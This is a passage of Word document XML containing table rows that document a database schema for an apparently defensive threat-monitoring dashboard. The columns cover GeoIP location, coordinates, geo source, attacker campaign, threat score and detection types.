      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">country, country_code, city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">GeoIP result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">lat, lon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DOUBLE PRECISION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Coordinates for the dashboard map.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">geo_source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">maxmind, dbip, demo (lab address), private or unknown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">campaign_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE → campaigns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Campaign the attacker belongs to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">threat_level, threat_score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT, INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">score 0–100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk derived from detections, logins and downloads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">attack_types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Distinct detection types raised for this IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">campaigns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">campaign_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
